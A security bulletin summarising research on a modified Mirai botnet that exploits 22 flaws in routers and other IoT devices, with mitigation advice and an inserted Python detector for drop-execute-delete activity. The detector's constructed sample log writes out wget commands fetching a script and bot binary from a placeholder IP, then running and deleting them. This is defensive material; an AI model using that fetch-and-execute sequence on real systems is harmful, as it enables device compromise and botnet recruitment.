Mirai Botnet Targets 22 Flaws in D-Link, Zyxel, Netgear Devices

Cyber Security Threat Summary:
Researchers from Palo Alto Networks’ Unit 42 have detected a modified version of the Mirai botnet that is actively exploiting nearly 20 vulnerabilities. The primary objective of this botnet is to compromise devices manufactured by D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. The compromised devices are then used to launch distributed denial of service (DDoS) attacks. Unit 42 researchers have identified this malware in two ongoing campaigns that began on March 14th and saw a significant surge in activity during April and June. In their report, the researchers warn that the botnet's developers continue to expand its code with exploits for additional vulnerabilities. The malware currently targets a total of 22 known security weaknesses in a range of connected devices, including routers, DVRs, NVRs, WiFi communication dongles, thermal monitoring systems, access control systems, and solar power generation monitors. One noteworthy flaw among them is CVE-2023-1389, which affects the TP-LINK Archer A21 (AX1800) WiFi router.

The Zero-Day Initiative (ZDI) reported that this vulnerability has been exploited by the Mirai malware since late April; however, it remains uncertain whether the two incidents are related. The attack begins by exploiting one of the mentioned vulnerabilities, which provides the foothold needed to execute a shell script fetched from an external server. This script downloads the botnet client matching the architecture of the compromised device. Once the bot client is running, the shell script downloader deletes the client's file to remove traces of the infection and reduce the chances of detection.
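A defender-side check for the infection chain just described, written as an added example (not Unit 42's tooling): it scans process-execution log lines for a file that one process fetched from a remote host, then executed, then deleted. The log layout, the address 198.51.100.7 and the file names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample log, one process execution per line: "<timestamp> <pid> <command line>".
# The first process mirrors the chain described above; the second is benign noise.
SAMPLE_LOG = """\
2023-06-01T10:00:01 4411 wget http://198.51.100.7/x.sh -O /tmp/x.sh
2023-06-01T10:00:02 4411 sh /tmp/x.sh
2023-06-01T10:00:03 4411 wget http://198.51.100.7/bot.arm7 -O /tmp/bot.arm7
2023-06-01T10:00:04 4411 chmod +x /tmp/bot.arm7
2023-06-01T10:00:05 4411 /tmp/bot.arm7
2023-06-01T10:00:06 4411 rm -f /tmp/bot.arm7
2023-06-01T10:05:00 5120 wget https://example.com/page.html -O /tmp/page.html
2023-06-01T10:05:01 5120 cat /tmp/page.html
"""

# Download tools commonly present on embedded Linux, with an explicit output path.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b.*\s(?:-O|-o|--output)\s+(\S+)")
# A fetched file run directly or through a shell interpreter.
EXEC_RE = re.compile(r"^(?:(?:sh|bash|busybox sh)\s+)?(/\S+)")
# Removal of the file, with any option flags before the path.
REMOVE_RE = re.compile(r"^rm\s+(?:-\S+\s+)*(\S+)")


def find_drop_exec_delete(log_text):
    """Return [(pid, path)] for every file a single process fetched, executed and then removed."""
    state = defaultdict(dict)  # pid -> {path: "fetched" | "executed"}
    hits = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        _ts, pid, cmd = raw.split(" ", 2)
        files = state[pid]
        m = FETCH_RE.search(cmd)
        if m:
            files[m.group(1)] = "fetched"
            continue
        m = EXEC_RE.match(cmd)
        if m and files.get(m.group(1)) == "fetched":
            files[m.group(1)] = "executed"
            continue
        m = REMOVE_RE.match(cmd)
        if m and files.get(m.group(1)) == "executed":
            hits.append((pid, m.group(1)))  # fetched, executed, then deleted
            del files[m.group(1)]
    return hits


if __name__ == "__main__":
    for pid, path in find_drop_exec_delete(SAMPLE_LOG):
        print(f"pid {pid}: {path} was downloaded, executed and deleted")
```

The check is stateful per process, so a benign download that is merely read (pid 5120 above) does not fire.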

In contrast to typical Mirai variants currently in circulation, this particular variant directly accesses encrypted strings within the .rodata section by utilizing an index. It bypasses the need for a string table to retrieve the configuration of the botnet client. This approach enables the malware to operate swiftly and covertly, reducing the likelihood of detection by security tools and enhancing its stealth capabilities.

Security Officer Comments:
Unit 42 further notes that this Mirai variant lacks the capability to brute force telnet/SSH login credentials; as a result, its distribution relies solely on the operators manually exploiting vulnerabilities. To mitigate the risk of infection, several precautions are advisable: apply the latest firmware update provided by the device vendor or manufacturer, replace default access credentials with strong and unique ones, and disable remote admin panel access if it is not required. Indications of a potential botnet malware infection on an IoT device may include excessive overheating, alterations in settings or configuration, frequent disconnections, and a general decline in overall performance.

Suggested Correction(s):
Users should be wary of IoT devices that lack traditional security features. Many IoT devices do not offer multi-factor authentication or even the ability to change default usernames and passwords. Cybercriminals will continue to target the ever-growing IoT device market.

If IoT devices must be used, users should consider segmenting them from sensitive networks.

Once a device has been compromised by a botnet, users may notice slow or sluggish systems and/or unusual traffic on the network.

Link(s):
https://www.bleepingcomputer.com/